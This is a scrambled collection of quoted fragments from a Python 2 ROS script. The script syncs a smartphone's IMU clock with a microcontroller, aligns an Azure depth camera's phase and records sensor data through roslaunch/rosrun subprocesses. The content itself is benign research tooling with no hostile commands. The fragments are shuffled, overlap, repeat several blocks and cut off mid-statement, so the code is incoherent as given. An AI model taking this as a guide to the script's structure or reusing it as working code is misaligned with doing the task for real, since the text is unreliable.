"'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts],",
"remote remote = RemoteControl(HOST) # Launching ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch",
"# Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' # Save",
"if IMU calibration and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded == False or",
"sequence: ' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence') time.sleep(0.01); #remote.stop_video()",
"performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2)",
"= rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess",
"the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister() #publisher_depth_to_mcu_offset.unregister() if __name__ == '__main__': main(sys.argv)",
"mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if len(args) == 1: print 'Please, provide",
"remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control global remote remote =",
"print_master('Tap Enter to start recording') raw_input() # Start video on s10 sm_remote_ts_ns, sm_frame_period_ns",
"data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun",
"' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close()",
"= time_sync2.M # Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2",
"- np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show",
"time_sleep_duration if time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit()",
"TimeReference import numpy as np import pandas as pd from io import StringIO",
"Wait, please') future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration), True,",
"lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length],",
"# Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" +",
"sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns / 1e9 # Compute mcu",
"print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence')",
"data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts depth_cam_ts",
"= rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num = 1 print_master('Current sequence",
": [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1], 'M02' : M[0,2], 'M10' :",
"+ end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start",
"def depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data):",
"',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\ '\\n' ) ''' #",
"value = sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync",
"number: ' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence') while True:",
"'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape,",
"Enter to indicate the next sequence') while True: input = select.select([sys.stdin], [], [],",
"mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0]",
"'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' :",
"publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01",
"[p.wait() for p in running_subpr_list] if remote is not None: try: remote.stop_video() except:",
"shaking time.sleep(1) # Gathering MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor:",
"+ 'MASTER ERROR: ' + string + bcolors.ENDC) subpr_list = [] mcu_imu_time =",
"from src.RemoteControl import RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess import rospy from",
"in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts",
"Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0]",
"mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as",
"from concurrent.futures import ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg import Imu, CameraInfo,",
"comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show mean of omegas",
"= data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts",
"'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts'",
"the next sequence') while True: input = select.select([sys.stdin], [], [], 0.01)[0] if input:",
"= mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input() #",
"msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg)",
"Enter to indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister() #publisher_depth_to_mcu_offset.unregister() if __name__",
"= pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() /",
"data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to",
"mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import signal import sys import select import",
"mean of omegas to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time",
"launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M # Compute resulting offset",
"\\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time,",
"[] mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common = None",
"handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for subpr in subpr_list: if",
"'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2],",
"is started')#\\nPress Ctrl+C to stop recording along with everything and exit') publisher_indicator =",
"of the first measurement # Get data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)),",
"plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close()",
"Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister()",
"str(comp_delay2) + ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset)",
"depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if",
"The smartphone's IP address class bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN",
"= '\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING =",
"global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past = 0 while mcu_cam_ts ==",
"'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess =",
"TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import signal import",
"if (value == \"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration = 1",
"queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past = 0 while mcu_cam_ts",
"to indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister() #publisher_depth_to_mcu_offset.unregister() if __name__ ==",
"subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop recording along with everything and",
"except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control global remote",
"= sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths min_length",
"+ comp_delay2) # Show mean of omegas to visually oversee sync performance plt.ion()",
"mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration and consequently",
"is None: print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 =",
"= data.header.stamp def main(args): if len(args) == 1: print 'Please, provide smartphone IP-address.",
"subpr_list = [] mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts",
"4 end_duration = 4 # Wait to avoid shaking time.sleep(1) # Gathering MCU",
"publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp",
"depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts",
"# Show the problem of the first measurement # Get data from s10",
"mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration",
"print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time",
"print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print",
": M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #",
"mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client",
"mcu_gyro_time[0] + comp_delay2) # Show mean of omegas to visually oversee sync performance",
"time_sync2.M # Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset",
"os HOST = None # The smartphone's IP address class bcolors: HEADER =",
"info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print",
"completely time.sleep(2) while True: print_master('Tap Enter to start Twist-n-Sync alignment process') input =",
"= remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns / 1e9 #",
"print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' + string + bcolors.ENDC) def",
"offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() #",
"args[1] # Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for",
"[sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1], 'M02' : M[0,2], 'M10' : M[1,0],",
"TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num = 1 print_master('Current sequence number: '",
"data.header.seq == 1: global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq ==",
"= '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T)",
"# Some time needed to get a camera frame and its info in",
"'M00' : M[0,0], 'M01' : M[0,1], 'M02' : M[0,2], 'M10' : M[1,0], 'M11'",
"sequence_num += 1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter to indicate the",
"mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset",
"and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num =",
"pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset'",
"}).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase alignment",
"enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished') # Get",
"or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past == 3: print('Timeout",
"string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' +",
"to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time",
"+ ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) +",
"= np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200])",
"#mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0]",
"frame data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess =",
"signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for subpr in subpr_list: if subpr is",
"out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' + str(sm_remote_ts) + ',' +",
"started')#\\nPress Ctrl+C to stop recording along with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts',",
"= str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter",
"IP-address. For instance, 10.30.65.166' sys.exit() global HOST HOST = args[1] # Register SIGINT",
"#sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show mean of omegas to",
"data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched completely time.sleep(2) while True: print_master('Tap Enter",
"M[2,0], 'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join(",
"in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of the first",
"= future.result() print_master('IMUs gathering finished') # Get data from mcu imu mcu_gyro_data =",
"and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait, please')",
"np import pandas as pd from io import StringIO from src.TimeSync import TimeSync2",
"concurrent.futures import ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference",
"sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths min_length =",
"sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0])",
"'M20' : M[2,0], 'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ),",
"mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if len(args)",
"0 while mcu_cam_ts == None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration",
"+ str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to get camrera frame data by",
"executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener",
": M[1,0], 'M11' : M[1,1], 'M12' : M[1,2], 'M20' : M[2,0], 'M21' :",
"sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time,",
":3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0],",
"if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed. Exiting')",
"select.select([sys.stdin], [], [], 0.01)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"):",
"rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num = 1 print_master('Current sequence number:",
"Wait to avoid shaking time.sleep(1) # Gathering MCU and smartphone IMU data with",
"bcolors.ENDC) subpr_list = [] mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts = None",
"= rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past",
"print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1]",
"IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait, please') future =",
"rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy as np import pandas",
"remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M # Compute resulting",
"# Added for debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame",
"import subprocess import rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy as",
"#imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data,",
"'/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False",
"data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv')",
"np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the",
"np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) #",
"data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join(",
"mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess = subprocess.Popen(('rosrun",
"data.header.stamp def main(args): if len(args) == 1: print 'Please, provide smartphone IP-address. For",
"mcu_cam_ts = None mcu_cam_ts_common = None remote = None def mcu_imu_callback(data): dat =",
"(value == \"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration = 1 main_duration",
"[], [], 2)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"): break",
"first measurement # Get data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False)",
"\"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num +=",
"index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait()",
"sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns / 1e9",
"M[0,2], 'M10' : M[1,0], 'M11' : M[1,1], 'M12' : M[1,2], 'M20' : M[2,0],",
"False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back')",
": M[2,0], 'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False)",
"dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y,",
"\"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time -",
"True sequence_num = 1 print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap Enter to",
"Added for debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame =",
"str(sequence_num)) print_master('Tap Enter to indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister() #publisher_depth_to_mcu_offset.unregister()",
"gathering started. Wait, please') future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration +",
"depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common = None remote = None def",
"index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface",
"from sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy as np import pandas as",
"'\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' + string +",
"# Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\",
"For instance, 10.30.65.166' sys.exit() global HOST HOST = args[1] # Register SIGINT handler",
"- sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() # 2. Azure camera alignment",
"1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence')",
"or time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit()",
"1 main_duration = 4 end_duration = 4 # Wait to avoid shaking time.sleep(1)",
"alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time",
"needed to get camrera frame data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message",
"= (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show mean of omegas to visually",
"time_sync2.time_delay M = time_sync2.M # Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time)",
"sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M # Compute resulting offset sm_mcu_clock_offset =",
"shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _",
"StringIO from src.TimeSync import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as",
"bcolors.OKGREEN + 'MASTER MESSAGE: ' + string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD +",
"str(sequence_num)) print_master('Tap Enter to indicate the next sequence') while True: input = select.select([sys.stdin],",
"if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common =",
"main(args): if len(args) == 1: print 'Please, provide smartphone IP-address. For instance, 10.30.65.166'",
"print_master('Tap Enter to indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister() #publisher_depth_to_mcu_offset.unregister() if",
"OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD",
"send_offset_subprocess.wait() # 3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording",
"global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts",
"min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\",
"alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send",
"import ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference import",
"print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time",
"time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \"",
"sequence_num = 1 print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap Enter to indicate",
"# Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset =",
"mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print",
"# 1. Twist-n-Sync start_duration = 1 main_duration = 4 end_duration = 4 #",
"resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] -",
"= True sequence_num = 1 print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap Enter",
"remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0]",
"WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE",
"while mcu_cam_ts == None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if",
